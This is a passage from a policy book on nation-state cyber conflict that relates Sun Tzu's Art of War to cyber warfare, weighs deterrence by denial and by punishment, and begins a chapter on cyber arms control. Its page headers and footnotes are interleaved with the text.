Terrain.” 104 NATION-STATE CYBER ATTACK MITIGATION STRATEGIES networks or try to use them for their own offensive purposes. These limitations make meticulous pre-operational cyber attack planning and timing critical.346347 Last but not least, one of the major challenges confronting any military commander is to keep track of the location and constitution of adversary forces. However, cyber defenses such as passive network monitoring devices can be nearly impossible to find. If in the neighborhood of your camp there should be any hilly country, ponds sur- rounded by aquatic grass, hollow basins filled with reeds, or woods with thick under- growth, they must be carefully routed out and searched; for these are places where men in ambush or insidious spies are likely to be lurking. AoW: IX. The Army on the March Cyber commanders are wise to assume, especially if they are conducting an of- fensive operation on adversary terrain, that the defenses and traps they can see are more powerful than they appear, and that there are some defenses in place that they will never find. Adversary sensors could even lie on the open Internet, such as on a commercial Internet Service Provider (ISP), outside of the cyber terrain that the adversary immediately controls. Time to Fight Once the decision to go to war has been made (or forced), Sun Tzu offers plenty of battlefield advice to a military commander. Art of War operations emphasize speed, surprise, economy of force, and asymmetry. These characteristics happen to be syn- onymous with cyber warfare. Rapidity is the essence of war: take advantage of the enemy’s unreadiness, make your way by unexpected routes, and attack unguarded spots. AoW: XI. The Nine Situations If you set a fully equipped army in march in order to snatch an advantage, the chanc- es are that you will be too late. On the other hand, to detach a flying column for the purpose involves the sacrifice of its baggage and stores. AoW: VII. Maneuvering The potential role of computer network operations in military conflict has been compared to strategic bombing, submarine warfare, special operations forces, and 346 Parks & Duggan, 2001. 347 Lewis, 2002. 105 Sun Tzu: Can Our Best Military Doctrine Encompass Cyber War? assassins.348 The goal of such unorthodox, asymmetric attacks is to inflict painful damage on an adversary from a safe distance or from close quarters with the ele- ment of surprise. By discovering the enemy’s dispositions and remaining invisible ourselves, we can keep our forces concentrated, while the enemy’s must be divided.... Hence there will be a whole pitted against separate parts of a whole, which means that we shall be many to the enemy’s few. AoW: VI. Weak Points and Strong In theory, a cyber attack can accomplish the same objectives as a special forces raid, with the added benefit of no human casualties on either side. If cyber attacks were to achieve that level of success, they could come to redefine elegance in warfare. A cyber attack is best understood not as an end in itself, but as an extraordinary means to accomplish almost any objective. Cyber propaganda can reach the entire world in seconds via online news media. Cyber espionage can be used to steal even nuclear weapons technology.349 Moreover, a successful cyber attack on an electrical grid could bring down myriad other infrastructures that have no other source of power.350 In fact, in 2008 and 2009, hackers were able to force entire nation-states offline.351 Attacking a nation’s critical infrastructure is an old idea. Militaries seek to win not just individual battles, but wars. Toward that end, they must reduce an adversary’s long-term ability to fight. And the employment of a universal tool to attack an ad- versary in creative ways is not new. Witness Sun Tzu’s advice from Art of War on the use of fire: There are five ways of attacking with fire. The first is to burn soldiers in their camp; the second is to burn stores; the third is to burn baggage trains; the fourth is to burn arsenals and magazines; the fifth is to hurl dropping fire amongst the enemy. AoW: XII. The Attack by Fire Sun Tzu did not know that baggage trains would one day need functioning comput- ers and uncompromised computer code to deliver their supplies on time. Specific tactical advice from Art of War provides a clear example. As in the Syrian air defense attack cited above, Sun Tzu instructs military commanders to accomplish 348 Parks & Duggan, 2001. 349 Gerth & Risen, 1999. 350 Divis, 2005. 351 Keizer, 2008; Keizer, 2009. 106 NATION-STATE CYBER ATTACK MITIGATION STRATEGIES something for which digital denial-of-service (DoS) appears ideal – to sever commu- nications between adversary military forces. Those who were called skillful leaders of old knew how to drive a wedge between the enemy’s front and rear; to prevent co-operation between his large and small divisions; to hinder the good troops from rescuing the bad, the officers from rallying their men. AoW: XI. The Nine Situations If modern military forces use the Internet as their primary means of communica- tion, what happens when the Internet is down? Thus it is likely that cyber attacks will play their most critical role when launched in concert with a conventional mili- tary (or terrorist) attack. Sun Tzu warns that surprise attacks may come when a defender’s level of alert is lowest: Now a soldier’s spirit is keenest in the morning; by noonday it has begun to flag; and in the evening, his mind is bent only on returning to camp. A clever general, therefore, avoids an army when its spirit is keen, but attacks it when it is sluggish and inclined to return. This is the art of studying moods. AoW: VII. Maneuvering Cyber criminals already operate according to this rule. They know the work sched- ules of network security personnel and often launch attacks in the evening, on week- ends, or on holidays when cyber defenders are at home. Unfortunately, given the current challenges facing cyber defense, it may be possible simply to tie up com- puter security specialists with diversionary attacks while the critical maneuvers take place elsewhere. If an invasion is successful, Sun Tzu advises military commanders to survive as much as possible on the adversary’s own resources. Hence a wise general makes a point of foraging on the enemy. One cartload of the enemy’s provisions is equivalent to twenty of one’s own, and likewise a single picul of his provender is equivalent to twenty from one’s own store. AoW: II. Waging War In this sense, Art of War and cyber warfare correspond perfectly. In computer hack- ing, attackers typically steal the credentials and privileges of an authorized user, af- ter which they effectively become an insider in the adversary’s (virtual) uniform. At that point, inflicting further damage on the network – and thus on the people using that network and their mission – through DoS or espionage is far easier. Such attacks could include poisoned pen correspondence and/or critical data modification. Even 107 Sun Tzu: Can Our Best Military Doctrine Encompass Cyber War? if the compromise is discovered and contained, adversary leadership may lose its trust in the computer network and cease to use it voluntarily. Finally, cyber warfare is no different from other military disciplines in that the suc- cess of an attack will depend on keeping its mission details a secret. Divine art of subtlety and secrecy! Through you we learn to be invisible, through you inaudible; and hence we can hold the enemy’s fate in our hands. AoW: VI. Weak Points and Strong In military jargon, this is called operational security (OPSEC). However, the charac- teristics that make cyber warfare possible – the ubiquity and interconnected nature of the Internet – ironically make good OPSEC more difficult than ever to achieve. Open source intelligence (OSINT) and computer hacking can benefit cyber defense as much as cyber offense. The Ideal Commander Decision-making in a national security context carries significant responsibilities because lives are often at stake. Thus, on a personal level, Art of War leadership requirements are high. The Commander stands for the virtues of wisdom, sincerity, benevolence, courage and strictness. AoW: I. Laying Plans Good leaders not only exploit flawed plans, but flawed adversaries.352 Discipline and self-control are encouraged; emotion and personal desire are discouraged.353 Sun Tzu states that to avoid a superior adversary is not cowardice, but wisdom.354 More- over, due to the painstaking nature of objective calculations, patience is a virtue. Thus it is that in war the victorious strategist only seeks battle after the victory has been won, whereas he who is destined to defeat first fights and afterwards looks for victory. AoW: IV. Tactical Dispositions Commanding a cyber corps will require a healthy mix of these admirable qualities. As a battleground, cyberspace offers political and military leaders almost limitless possibilities for success – and failure. Behind its façade of global connectivity and influence, the Internet has a complicated and vulnerable architecture that is an ideal 352 Parks & Duggan, 2001. 353 Sun Tzu, Art of War: “VIII. Variation in Tactics.” 354 Sawyer, 1994. 108 NATION-STATE CYBER ATTACK MITIGATION STRATEGIES environment in which to conduct asymmetric and often anonymous military opera- tions. Imagination and creativity are required skill sets. Cyber warfare also involves an enormous amount of uncertainty; even knowing whether one is under attack can be an immense challenge. And the high tempo of Internet operations may lead to a high burn-out rate throughout the ranks. A cyber commander must have a minimum level of subject matter expertise in IT. The core concepts of computing, networking, and data security should be thorough- ly understood before employing them in support of a national security agenda. Any leader must be able to articulate the mission so that everyone in the organization understands and believes in it;355 a further challenge in cyber warfare will be com- municating with highly technical personalities, who have vastly different personal needs than the soldiers of a traditional military element. In all future wars, military leadership will have the challenge of coordinating and deconflicting the cyber and non-cyber elements of a battle plan. Sun Tzu gives high praise for a great tactician: Having collected an army and concentrated his forces, he must blend and harmonize the different elements thereof before pitching his camp. After that, comes tactical maneuvering, than which there is nothing more difficult. The difficulty of tactical maneuvering consists in turning the devious into the direct, and misfortune into gain. AoW: VII. Maneuvering As circumstances change throughout the course of a conflict, both tactics and strat- egy must be reevaluated and modified to fit the new environment.356 He who can modify his tactics in relation to his opponent and thereby succeed in winning, may be called a heaven-born captain. AoW: VI. Weak Points and Strong The dynamic nature of the Internet and the speed of computer network operations guarantee that traditional military challenges such as seizing the initiative and maintaining momentum will require faster decision cycles than a traditional chain- of-command can manage. A cyber commander must have the ability and the trust of his or her superiors to act quickly, creatively, and decisively. 355 Rarick, 1996. 356 Ibid. 109 Sun Tzu: Can Our Best Military Doctrine Encompass Cyber War? Art of Cyber War: Elements of a New Framework Art of War is the most influential military treatise in human history. The book has survived over 2,500 years in part because its guidance is highly flexible. Strategists and tacticians have adapted Art of War to new circumstances across many scientific revolutions, and Sun Tzu’s insight has never lost much of its resonance. This chapter argues that in the future cyber warfare practitioners should also use Art of War as an essential guide to military strategy. However, cyberspace possesses many characteristics that are unlike anything Sun Tzu could have imagined in an- cient China. There are at least ten distinctive aspects of the cyber battlefield. 1. The Internet is an artificial environment that can be shaped in part according to national security requirements. 2. The rapid proliferation of Internet technologies, including hacker tools and tactics, makes it impossible for any organization to be familiar with all of them. 3. The physical proximity of adversaries loses much of its relevance as cyber attacks are launched without regard to terrestrial geography. 4. Frequent software updates and network reconfiguration change Internet ge- ography unpredictably and without warning. 5. In a reversal of our historical understanding of warfare, the asymmetric na- ture of cyber attacks strongly favors the attacker. 6. Cyber attacks are more flexible than any weapon the world has seen. They can be used for propaganda, espionage, and the destruction of critical infra- structure. 7. Cyber attacks can be conducted with such a high degree of anonymity that defense strategies such as deterrence and retaliation are not credible. 8. It is possible that a lengthy and costly cyber war could take place without anyone but the direct participants knowing about it.357 9. The intangible nature of cyberspace can make the calculation of victory, de- feat, and battle damage a highly subjective undertaking. 10. There are few moral inhibitions to cyber warfare because it relates primarily to the use and exploitation of information in the form of computer code and data packets; so far, there is little perceived human suffering. 357 Libicki, 2009. 110 NATION-STATE CYBER ATTACK MITIGATION STRATEGIES None of these characteristics of cyberspace or cyber conflict fits easily into Sun Tzu’s paradigm. As national security thinkers and military strategists begin to write concepts, strategies, and doctrine for cyber warfare with the Art of War model in mind, they should be aware of these differences. 111 Deterrence: Can We Prevent Cyber Attacks? 7. DETERRENCE: CAN WE PREVENT CYBER ATTACKS? National security planners have begun to look beyond reactive, tactical cyber de- fense to proactive, strategic cyber defense, which may include international military deterrence. The incredible power of nuclear weapons gave birth to deterrence, a military strategy in which the purpose of armies shifted from winning wars to pre- venting them. Although cyber attacks per se do not compare to a nuclear explosion, they do pose a serious and increasing threat to international security. Real-world examples suggest that cyber warfare will play a lead role in future international con- flicts. This chapter examines the two deterrence strategies available to nation-states (denial and punishment) and their three basic requirements (capability, communica- tion, and credibility) in light of cyber warfare. It also explores whether the two most challenging aspects of cyber attacks – attribution and asymmetry – will make cyber attack deterrence an impossible task. Cyber Attacks and Deterrence Theory The advent of nuclear weapons disrupted the historical logic of war completely. Deterrence theory emerged after the United States and the Soviet Union created enough military firepower to destroy human civilization on our planet. From that point forward, according to the American military strategist Bernard Brodie,358 the purpose of armies shifted from winning wars to preventing them. Nothing compares to the destructive power of a nuclear blast. But cyber attacks loom on the horizon as a threat that is best understood as an extraordinary means to a wide variety of political and military ends, many of which can have serious national security ramifications. For example, computer hacking can be used to steal offensive weapons technology (including technology for weapons of mass destruc- tion) or to render an adversary’s defenses inoperable during a conventional military attack.359 In that light, attempting proactively to deter cyber attacks may become an essential part of national military strategies. This chapter examines whether it is possible to apply deterrence theory to cyber attacks. What military officers call the “battlespace” grows more difficult to define – and to defend – over time. In 1965, Gordon Moore correctly predicted that the number of transistors on a computer chip would double every two years. There has been simi- lar growth in almost all aspects of information technology (IT), including practical 358 Brodie, 1946. 359 Fulghum et al., 2007. 112 NATION-STATE CYBER ATTACK MITIGATION STRATEGIES encryption, user-friendly hacker tools, and Web-enabled open source intelligence (OSINT). Even the basic services of a modern society, such as water, electricity and telecommunications, are now computerized and often connected to the Internet.360 Advances in technology are normally evolutionary, but they can be revolutionary – artillery reached over the front lines of battle, and rockets and airplanes crossed national boundaries. Today, cyber attacks can target political leadership, military systems, and average citizens anywhere in the world, during peacetime or war, with the added benefit of attacker anonymity. Political and military strategists now use and abuse computers, databases, and the networks that connect them to achieve their objectives. In the early 1980s, this concept was already known in the Soviet Union as the Military Technological Revolution (MTR); after the 1991 Gulf War, the Pentagon’s Revolution in Military Affairs was almost a household term.361 However, the real-world impact of cyber conflict is still difficult to appreciate, in part because there have been no wars between modern cyber-capable militaries. But an examination of international affairs over the past two decades suggests that cyber battles of increasing consequence are easy to find. Since the earliest days of the World Wide Web, Chechen guerilla fighters, armed not only with rifles but with digital cameras and HTML, have demonstrated the power of Internet-enabled propa- ganda.362 In 2001, tensions between the United States and China spilled over into a non-state, “patriotic” hacker war, with uncertain consequences for national security leadership.363 In 2007, Syrian air defense was reportedly disabled by a cyber attack moments before the Israeli air force demolished an alleged Syrian nuclear reactor.364 In 2009, the entire nation-state of Kyrgyzstan was knocked offline during a time of domestic political crisis,365 and Iranian voters, in “open war” with state security forces, used peer-to-peer social networking websites to avoid government restric- tions on dialogue with the outside world.366 Such a rapid development in the use of cyber tools and tactics suggests that they will play a lead role in future international conflicts. While the Internet has on balance been hugely beneficial to society, law enforce- ment, and counterintelligence, personnel struggle to keep pace with its security 360 Geers, 2009. 361 Mishra, 2003. 362 Goble, 1999. 363 On April 26, 2001, the Federal Bureau of Investigation (FBI) National Infrastructure Protection Cen- ter (NIPC) released Advisory 01-009, “Increased Internet Attacks against U.S. Web Sites and Mail Servers Possible in Early May.” 364 Fulghum et al, 2007. 365 Keizer, 2009. 366 Stöcker et al., 2009. 113 Deterrence: Can We Prevent Cyber Attacks? implications. The ubiquity of the Internet makes cyber warfare a strategic weapon since adversaries can exchange blows at will, regardless of the physical distance be- tween them. By contrast, cyber defense is a tedious process, and cyber attack inves- tigations are typically inconclusive. The astonishing achievements of cyber crime and cyber espionage should hint at the potential damage of a true nation-state-spon- sored cyber attack. Intelligence officials such as former CIA director James Woolsey fear that even terrorist groups will possess cyber weapons of strategic significance in the next few years. Military leaders have begun to look beyond reactive, tactical cyber defense367 to the formulation of a proactive, strategic cyber defense policy, which may include inter- national military deterrence.368 However, two challenging aspects of cyber attacks – attribution and asymmetry – will be difficult to overcome. In theory, nation-states have two primary deterrence strategies – denial and punish- ment. Both strategies have three basic requirements – capability, communication, and credibility.369 This chapter will examine each concept in turn and explore whether it is possible to deter cyber attacks at the nation-state level. Cyber Attack Deterrence by Denial Deterrence by denial is a strategy in which an adversary is physically prevented from acquiring a threatening technology. This is the preferred option in the nuclear sphere because there is no practical defense against a nuclear explosion. Its heat alone is comparable to the interior of the sun, and its blast can demolish reinforced concrete buildings three kilometers away.370 The abhorrent nature of nuclear war- fare makes even a theoretical victory difficult to imagine. Deterrence by denial is a philosophy embodied in the Non-Proliferation Treaty (NPT) and one reason behind current international tension with North Korea and Iran.371 367 E.g., how to configure a network or an intrusion detection system. 368 In May, 2009, the head of the U.S. Strategic Command, Air Force Gen. Kevin Chilton, stated that retali- ation for a cyber attack would not necessarily be limited to cyberspace. 369 These deterrence strategies and requirements I took from a personal interview with Prof. Peter D. Feaver, Alexander F. Hehmeyer Professor of Political Science and Public Policy at Duke University and Director of the Triangle Institute for Security Studies (TISS). 370 Sartori, 1983. 371 Shultz et al., 2007. 114 NATION-STATE CYBER ATTACK MITIGATION STRATEGIES Denial: Capability Despite the diplomatic efforts of NPT, the well-funded inspection regime of the In- ternational Atomic Energy Agency (IAEA)372 and unilateral military operations such as Israel’s destruction of nuclear facilities in Iraq in 1981 and in Syria in 2007, the size of the world’s nuclear club is growing. In addition to the five permanent mem- bers of the United Nations Security Council,373 de facto members now include India, Israel, Pakistan, and North Korea.374 Cyber attack tools and techniques are not nearly as dangerous as their nuclear coun- terparts, but they are by comparison simple to acquire, deploy, and hide. Hacker training and conferences are abundant; over the past 17 years, almost 1,000 how-to presentations have been given at DEF CON. More sensitive hacker information can be kept secret, physically transported on a miniscule hard drive, or sent encrypted across the Internet. A nuclear weapons program is difficult to hide;375 a cyber weap- ons program is not. Cyber attacks can be tested discretely in a laboratory environ- ment376 or live on the Internet, anonymously. Further, it appears increasingly com- mon to outsource the illegal business of hacking to a commercial or criminal third party.377 A major challenge to cyber attack tool anti-proliferation is how to define malicious code. A legitimate path for remote system administration can also be used by a masquerading hacker to steal national secrets. Even published operating system and application code is difficult for experts to understand thoroughly, as there are simply too many lines of code to analyze.378 The dynamic and fast-evolving nature of cyber attack technology contrasts sharply with the fundamental design of nuclear warheads, which, with the exception of the neutron bomb, has not changed much since the late 1950s.379 In the single month of May 2009, Kaspersky Anti-Virus Lab 372 The IAEA is the world’s nuclear inspectorate, with more than four decades of verification experience. Inspectors work to verify that safeguarded nuclear material and activities are not used for military purposes. The annual budget of IAEA is almost $500 million USD. 373 China, France, Russia, United Kingdom and United States. 374 Huntley, 2009. 375 Milhollin & Lincy, 2009. 376 With nuclear weapons, a hard-to-conceal test is required to prove that a capability exists. If the goal were cyber attack tool anti-proliferation, it would seem difficult to know if or when success had been achieved. 377 Jolly, 2009: In 2009, the French Interior Ministry investigated the collection of “strategic intelli- gence” by a former intelligence agent and a for-hire computer hacker on behalf of some of France’s biggest companies. 378 Cole, 2002. 379 There have, however, been many design modifications relating to safety, security, and reliability. 115 Deterrence: Can We Prevent Cyber Attacks? reported that it had found 42,520 unique, suspicious programs on its clients’ com- puters. Finally, in nuclear warfare one of the most important considerations is the retention of a second-strike capability. Following a surprise attack, is it still possible for the victim to fight back? In nuclear and conventional warfare, this is a constant worry among strategic planners. In contrast, a unique characteristic of cyber attacks is their ability to be launched from anywhere in the world, at any time. During the cyber attacks on Estonia in 2007, most of the compromised and attacking comput- ers were located in the United States.380 Cyber attacks can be set to launch under predetermined conditions or on a certain date in the future. Discovered attack tools can also be difficult to remove from a computer network completely, even by forensic experts. With cyber attack technology, it seems impossible to know for sure that all adversary attack options have been eliminated. Denial: Communication Cyber attacks now have the attention of the world’s national security planners. In the U.S., enhancing cyber security was one of the six “mission objectives” of the 2009 Director of National Intelligence (ODNI) National Intelligence Strategy,381 and counteracting the cyber threat is currently the third-highest priority of the Federal Bureau of Investigation (FBI), after preventing terrorist attacks and thwarting for- eign intelligence operations. However, cyber warfare is a new phenomenon; national and international norms have yet to be established. Different approaches are under consideration. One is to broaden international law enforcement coordination, specifically via the Council of Europe Convention on Cybercrime. Objections to this strategy include the possible infringement of national sovereignty by foreign law enforcement agencies. Another approach is to prohibit the development of cyber weapons via international treaty, such as that negotiated for chemical weapons. Articles to such a treaty might ban supply chain attacks and the disruption of non-combatant networks, as well as in- crease international management of the Internet. One objection to the second ap- proach is that it does little to improve cyber attack attribution.382 380 As computer incident response teams began to block hostile network packets, the source of the attack moved to countries with less mature and/or helpful network management practices. 381 The other five objectives were Combat Violent Extremism, Counter WMD Proliferation, Provide Stra- tegic Intelligence and Warning, Integrate Counterintelligence Capabilities, and Support Current Op- erations. 382 Markoff & Kramer, 2009b. 116 NATION-STATE CYBER ATTACK MITIGATION STRATEGIES The Convention on Cybercrime is the first such international treaty. It describes law enforcement powers and procedures related to data interception and the search of computer networks. In 2009, forty-six nations were signatories, and twenty-six had ratified the treaty.383 Its main objective, set out in the Preamble, is to pursue a common criminal policy aimed at the protection of society against cybercrime, especially via national legislation and international cooperation. Deterrence is spe- cifically mentioned as a goal: “the present Convention is necessary to deter action directed against the confidentiality, integrity and availability of computer systems.” The continued success of the Convention on Cybercrime requires addressing myriad national and international data security and privacy concerns, including the respect for national sovereignty. A non-governmental organization in Thailand, for example, has claimed that similar legislation there has been used by the government more to threaten Thai citizens than to protect them.384 A proposed international treaty banning the development and use of hacker tools would be no less challenging to sign and enforce, because many hacker tools can properly be called dual-use tech- nology.385 The Council of Europe’s protocol on criminalizing racist and xenophobic statements on the Web may offer a partial solution. Because countries have wildly varying laws regarding what constitutes free speech, universally-accessible websites can create international legal headaches.386 This protocol recommends a nationally-tailored ap- proach to regulation that allows for implementation at the local ISP and end-user levels. In this way, signatories are able to project their norms of free speech onto the Internet, without extending liability beyond national borders.387388 Denial: Credibility Deterrence theory states that capability and communication alone are insufficient. The threatened party must believe that the threat of retaliation – or of a preemptive strike – is real. This third requirement of deterrence is the most difficult for national 383 The U.S. acceded to the Council of Europe Convention on Cybercrime on January 1, 2007. 384 Anonymous, 2009. 385 System administrators often use hacker tools such as a password cracker to audit their own networks. Cyber defense studies in academia require hacker tools for laboratory purposes. 386 For example, a French judge found a U.S. ISP criminally liable for hosting an auction of Nazi parapher- nalia, the sale of which is illegal in France. 387 Oberdorfer Nyberg, 2004. 388 The named methods of implementing the protocol are self-regulation of content by ISPs, government regulation of specific content, government regulation of end-users, and government regulation of local ISPs. 117 Deterrence: Can We Prevent Cyber Attacks? security leadership to assess because it involves evaluating human psychology, ra- tionality, the odds of miscalculation, and foreign political-military affairs. At the beginning of the year 2011, it was still not likely that nation-states would sacrifice much to prevent the proliferation of cyber attack tools and techniques. Al- though it is indisputable that cyber attacks cause enormous financial damage, that world leaders increasingly complain of cyber espionage, and that Internet-connect- ed critical infrastructures are now at risk, deterrence theory was created for nuclear weapons. In terms of their destructive power, nukes are in a class by themselves. Cyber attacks per se do not cause explosions, deadly heat, radiation, an electro- magnetic pulse (EMP), or human casualties.389 However, a future cyber attack, if it caused any of the above effects, could change this perception. Worldwide technological convergence, as described by Dawson,390 is constantly expanding what hackers call the “attack surface.” In theory, the suc- cessful conquest of an adversary’s Internet space could equate to assuming com- mand and control of the adversary’s military forces, and firing their own weapons against their own cities. But for now, this scenario still lies in the realm of science fiction. Cyber Attack Deterrence by Punishment Deterrence by punishment is a strategy of last resort. It signifies that deterrence by denial was not possible or has failed, and that Country X possesses the technology it needs to threaten Country Y or its government. The goal of deterrence by punish- ment is to prevent aggression by threatening greater aggression in the form of pain- ful and perhaps fatal retaliation. For the strategy to work, Country X must be con- vinced that victory is not possible, even given the option of using its new technology. Two key aspects of cyber attacks present challenges to national security planners who would seek to deter them by punishment: attribution and asymmetry. The first challenge undermines a state’s capability to respond to a cyber attack, and the sec- ond undermines its credibility. Punishment: Capability All nations with robust military, law enforcement, and/or diplomatic might theoreti- cally have the power to punish a cyber attacker in some way, either in cyberspace 389 Persuasive cyber war skeptics include Cambridge University Professor Ross Anderson and Wired “Threat Level” Editor Kevin Poulsen. 390 Dawson, 2003. 118 NATION-STATE CYBER ATTACK MITIGATION STRATEGIES or in the real world. And if a known attacker is beyond the reach of physical pursuit, the victim could at least present incriminating evidence in an international forum. But in practice, for punishment to be a viable option, the victim must know for sure who the attacker is and be able to prove it. In cyber warfare, the attacker enjoys a formidable advantage: anonymity. Proof in cyberspace is hard to come by. Smart hackers hide within the maze-like architec- ture of the Internet. They route attacks through countries with which the target’s government has poor diplomatic relations or no law enforcement cooperation, and exploit unwitting third-party networks. Cyber investigations typically end at a hacked, abandoned computer, where the trail goes cold. Plausible deniability is also a concern. Because hackers obscure the true origin of an attack by hopping through a series of compromised computers to reach their target, the real attacker could always claim that her computer had merely been hacked and used in someone else’s operation. This aspect of cyber attacks also makes “false flagging,” or intentionally trying to pin the blame on a third party, an attractive option. Even in the event that cyber attack attribution is positively determined, deterrence by punishment is still inherently less credible than deterrence by denial. It requires decision-makers to make more difficult choices. A proactive law enforcement strat- egy is easier to justify than the use of military force, which can cause physical de- struction, human casualties, or other collateral damage. At the very least, there will be serious diplomatic consequences. One important decision facing decision-makers in the aftermath of a cyber attack would be whether to retaliate in kind or to employ more conventional weapons. It may seem logical to keep the conflict within cyberspace, but a cyber-only response does not guarantee proportionality, and a cyber counterattack may lack the required precision. A misfire in cyberspace might adversely affect critical national infrastruc- ture, such as a hospital, which could result in a violation of the Geneva Conven- tion and even bring war crimes charges against national authorities.391 The Law of Armed Conflict states that the means and methods of warfare are not unlimited:392 commanders may use “only that degree and kind of force ... required in order to achieve the legitimate purpose of the conflict ... with the minimum expenditure of life and resources.”393 391 Graham, 1999. 392 See “Convention (IV) respecting the Laws and Customs of War on Land and its annex: Regulations concerning the Laws and Customs of War on Land.” The Hague, 18 October 1907, International Com- mittee of the Red Cross. 393 This quote is from The Manual of the Law of Armed Conflict, Section 2.2 (Military Necessity). United Kingdom: Ministry of Defence. Oxford: OUP. (2004). 119 Deterrence: Can We Prevent Cyber Attacks? Punishment: Communication Whereas deterrence by denial relies on a criminal law framework for support, the foundation of deterrence by punishment lies in military doctrine. When bombs be- gin to fall on adversary targets, diplomatic and law enforcement options have nor- mally run their course. Military doctrine serves at least two important purposes: to prepare a nation’s military forces for conflict, and to warn potential foes of the consequences of war. It should not be surprising that the advent of an open and ubiquitous communica- tions medium like the Internet demands a reassessment of military strategy, tactics, and doctrine. In 2006, a secret Israeli government report argued for a “sea change” in military thinking because the national security paradigm of army versus army was under assault by suicide bombers, Katyusha rockets and computer hackers, none of whom has to have direct ties to government or even be susceptible to po- litical pressure.394 In China, the potential impact of computer network operations on the nature of warfare is thought to be strong enough even to have transformed 2,500 years of military wisdom; the Chinese military has almost certainly quit the defensive depth of the Chinese countryside to conquer international cyberspace.395 In Washington, one of the first reports that incoming President Obama found on his desk was “Securing Cyberspace for the 44th Presidency,” which argued that the U.S. must have a credible military presence in cyberspace to act as a deterrent against operations by its adversaries in that domain.396 Cyber doctrine must address how military and civilian authorities will collaborate to protect private sector critical information infrastructure. Even cyber attacks that strike purely military sites are likely to traverse civilian networks before reaching their target. In fact, the destruction of civilian infrastructure may be the cyber at- tacker’s only goal. A further challenge is that private sector enterprises such as banks have been reluctant to disclose successful cyber attacks against them for fear of an impact on their bottom line. This dynamic could make it difficult for national security leadership even to know that an attack on its national territory – in violation of its national sovereignty – has occurred. Thus, proactive cyber attack deterrence by government to defend civilian infrastructure will be difficult to achieve, and any national response may be too little, too late. The dynamic nature of cyber attacks could ensure that defenders never see the same attack twice. Therefore, decision makers will need a range of diplomatic and military options to consider for a punitive response. In terms of military doctrine, 394 Fulghum, 2006. 395 Rose, 1999. 396 Lewis, 2008. 120 NATION-STATE CYBER ATTACK MITIGATION STRATEGIES one possibility might be the delineation of red lines in cyberspace. Propaganda and low-level computer network exploitation (CNE) may trigger the first line of passive cyber defense, while the manipulation of code in an operational weapons system could be grounds for real-world retaliation. Finally, to support a deterrence strategy, cyber doctrine must be clearly written. An adversary should have no doubt what the consequences will be if the red lines are crossed. Punishment: Credibility As we have seen, the credibility of cyber attack deterrence by denial is low. The po- litical will and even the capability to attempt such a denial are lacking. Therefore, a strategy of cyber attack deterrence by punishment is a more likely scenario. The trouble with a punishment strategy, however, is that governments are always reluctant to authorize the use of military force (for good reason). Deterrence by pun- ishment is a simple strategy, but one that demands a high burden of proof: a serious crime must have been committed, and the culprit positively identified. The challenge of cyber attack attribution, as described above, means that decision-makers will likely not have enough information on an adversary’s cyber capabilities, intentions, and operations to respond in a timely fashion. However, there is another characteristic of cyber attacks that undermines the cred- ibility of deterrence by punishment even more: asymmetry. At the nation-state level, some countries are more dependent upon the Internet than others. Some govern- ments possess sophisticated computer network attack programs, while others have none at all. Non-state actors such as a lone hacker or a terrorist group may not possess any computer network or other identifiable infrastructure against which to retaliate. The asymmetric nature of information technology and cyber warfare manifests it- self in countless ways. From a technical perspective, the Smurf attack is a classic ex- ample. A hacker sitting at computer X pretends to be coming from computer Y, then requests data from hundreds of other computers at once. Myriad responses easily overwhelm computer Y, creating a denial-of-service condition.397 From a human per- spective, the case of Briton Gary McKinnon is illuminating. According to McKinnon, he is a “bumbling hacker” who was merely looking for UFO data on unsecured Penta- gon networks. But the U.S. prosecutor seeking his extradition describes McKinnon’s 397 See “Smurf IP Denial-of-Service Attacks,” CERT Advisory CA-1998-01. 121 Deterrence: Can We Prevent Cyber Attacks? exploits as “the biggest military computer hack of all time.”398399 In terms of financial damages, “MafiaBoy” – a 15 year-old kid from Montreal – in 2001 was able to deny Internet service to some of the world’s biggest online companies, causing an esti- mated $1.7 billion in damage.400 Mutually Assured Disruption (MAD) There is a growing relationship between computer security and national security. Military leaders, fearing the potential impact of cyber warfare as well as the start of a cyber arms race, are now considering whether it is possible proactively to deter cyber attacks. At the nation-state level, there are two possible deterrence strategies: denial and punishment. In cyberspace, both suffer from a lack of credibility. Denial is unlikely due to the ease with which cyber attack technology can be acquired, the immaturity of international legal frameworks, the absence of an inspection regime, and the per- ception that cyber attacks are not dangerous enough to merit deterrence in the first place. Punishment is the only real option, but this deterrence strategy lacks cred- ibility due to the daunting challenges of cyber attack attribution and asymmetry. At a minimum, attribution must improve before a cyber attacker may feel deterred. This will take time. In the short term, organizations must improve their ability to collect and transmit digital evidence, especially to international partners. In the long term, national security planners should try to create a Distant Early Warning Line (DEWL) for cyber war and the capability to select from a range of rapid response tactics. To pave the way forward, a legal foundation for cyber attack, defense, and deter- rence strategies is needed as soon as possible. Because information technology changes so quickly – no one can predict what the next cyber attack will look like – it may be necessary to adopt an effects-based approach. If a cyber attack results in a level of human suffering or economic destruction equivalent to a conventional mili- tary attack, then it could be considered an act of war, and it should be subject to the existing laws of war. Consequently, national security planners have no time to waste in reevaluating, and updating, if necessary, the Geneva, Hague, and Human Rights conventions, as well as the Just War theory, and more. 398 Lee, 2006. 399 Glendinning, 2006: The press has speculated whether one reason for prosecuting McKinnon is for the deterrent effect it could have on other cyber attackers. 400 Verton, 2002. 122 NATION-STATE CYBER ATTACK MITIGATION STRATEGIES Back to the Cold War. By the year 1968, Soviet mastery of nuclear technology had made one-sided nuclear deterrence meaningless.401 The U.S. and the USSR were forced into a position of mutual deterrence or Mutually Assured Destruction (MAD). Both sides had the ultimate weapon, as well as a second-strike capability. Although cyber attacks do not possess the power of a nuclear explosion, they do pose a se- rious and increasing threat to international security, and anti-proliferation efforts appear futile. Welcome to the era of Mutually Assured Disruption.402 401 Specifically, it was the Soviet Union’s ability to mass produce nuclear weapons, and to compete in the nuclear arms race, that changed the strategic equation in 1968. 402 Pendall, 2004; Derene, 2009. 123 Arms Control: Can We Limit Cyber Weapons? 8. ARMS CONTROL: CAN WE LIMIT CYBER WEAPONS? As world leaders look beyond temporary fixes to the challenge of securing the In- ternet, one possible solution may be an international arms control treaty for cyber- space. The 1997 Chemical Weapons Convention (CWC) provides national security planners with a useful model. CWC has been ratified by 98% of the world’s govern- ments and encompasses 95% of the world’s population. It compels signatories not to produce or to use chemical weapons (CW), and they must destroy existing CW stockpiles. As a means and method of war, CW have now almost completely lost their legitimacy. This chapter examines the aspects of CWC that could help to con- tain conflict in cyberspace. It also explores the characteristics of cyber warfare that seem to defy traditional threat mitigation. Cyber Attack Mitigation by Political Means The world has 